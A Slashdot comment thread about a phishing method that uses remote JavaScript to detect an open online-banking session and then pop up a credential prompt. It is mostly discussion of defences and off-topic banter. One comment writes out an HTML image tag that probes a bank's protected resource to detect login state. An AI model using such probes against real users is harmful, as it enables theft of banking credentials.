Phishing For Bank Info Without Any Pesky Malware

Emb3rz writes "DarkReading.com brings us news of a new approach to phishing that targets online banking sites. Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love. Instead, it uses JavaScript from a remote page to detect if you have a banking site open, and prompts you for info via popup if you do."

Re:XSS

[AKAImBatman]

BTW, for those of you who are curious about this attack (and are too lazy to RTFA), this basically uses a common image set behind a protected login. e.g.

<img src="https://www.mybank.com/protected/images/lock.gif" onerror="notLoggedInSoRefresh();" onload="hahaGotEm();">

If you ping the blasted thing for long enough, you will be able to detect the user logging in. One pop-up later and you've stolen their info.

Now protecting against this sort of issue is an interesting question. Ideally static resources should never be behind closed doors. But that answer is a bit of a cop-out. The next best thing is to ensure that session cookies are maintained inside the login tab ONLY and that persistent cookies are not used for auto-login.

(Interesting question: I wonder if Chrome is vulnerable? With process isolation, this trick would require that the main Chrome process delegate the handling of session cookies. Which seems like a bad idea anyway, so I would hope they implemented the browser in a more secure manner.)

Things to learn from this.

[john.picard]

The next thing you know, they'll make up a screen scraper in JavaScript. There are several things to learn from this. For the users, one, that you should completely clear your browser (Clear Private Data or similar) before going to a banking website, two that you should NEVER open other websites (or have them open) while you're signed in to a banking website, third that when you've finished banking, you should completely clear your browser again. For the browser makers (Firefox devs reading this?), third party cookies should be disabled by default, the option to turn them on should come with stern warnings, and each website can ONLY read cookies previously set by itself. Further when an encrypted page is opened, its memory should be such that other pages cannot access any part of it. In other words, the same sandboxing approach taken to deal with other security issues, within the browser for encrypted pages.

Re:Simple Solution...

[X0563511]

Once more, Darwin extends into the internet.

Computers are tools. They do what they are told without question. The internet is made of computers. By extension, it is a tool that does exactly what it is told.

Kind of like a handgun, and you don't (usually) let people run around with those without some kind of training.

Also like a handgun, most tools don't care who is issuing the instructions - they just do it. That tablesaw doesn't care if it's a 2x4 or your forearm, it saws anyways.

Yes, I'm an elitist bastard sometimes.

Re:The Best Defense is Offense

[eln]

Some of us like to believe that the Constitution, as well as all other laws and treaties the government operates under, restricts the government's actions everywhere that it operates, not just on American soil, and that it also precludes the government from encouraging other nations to do what it itself is prohibited from doing. I don't see how we can call ourselves a just nation if we simply outsource acts that we would find deplorable if our own government were carrying them out.

I don't deny that our government has had something of a bad history of clandestinely encouraging foreign powers to "disappear" people we find troublesome, but that doesn't make it right or legal, and it certainly doesn't mean we should encourage it to happen more often.

A 'secure mode' for browsers?

[dnwq]

Internet Explorer has a porn^H^H^H^H privacy mode where privacy settings are locked down. Why not build an analagous 'secure mode' for Firefox or Konq. where security settings are all locked to high heaven for that browsing session only?

That way users can both bank online securely and not have half the web break for them because they've disabled javascript.

Re:The article makes it sound so simple...

[blueg3]

You don't need to hack a high-profile site to put malicious JavaScript on there. Most high-profile sites, directly or indirectly, load tons of third-party objects.

Advertising, for example, is an excellent JavaScript injection vector.

paranoia-plus...

[BrokenHalo]

My paranoia has led me into a practice of doing my banking in a single browser session, clearing cookies, cache and history before and after, and closing/restarting the browser when finished.

Looks like I was right about the monsters behind the sofa after all.

Re:paranoia-plus...

[stranger_to_himself]

My paranoia has led me into a practice of doing my banking in a single browser session, clearing cookies, cache and history before and after, and closing/restarting the browser when finished.

My paranoia has led me into a practice of doing my banking by going to the bank.

Re:The Best Defense is Offense

[N1AK]

Slashdot: Where fining people for copyright infringement is wrong but killing people for stealing login details is "Insightful".

Re:The Best Defense is Offense

[Muad'Dave]

Maybe "you" do, and you don't know it. I think it would be prudent to call BoA, tell them what you received, and make sure someone isn't laundering money using an account opened with your SSN, name, or address.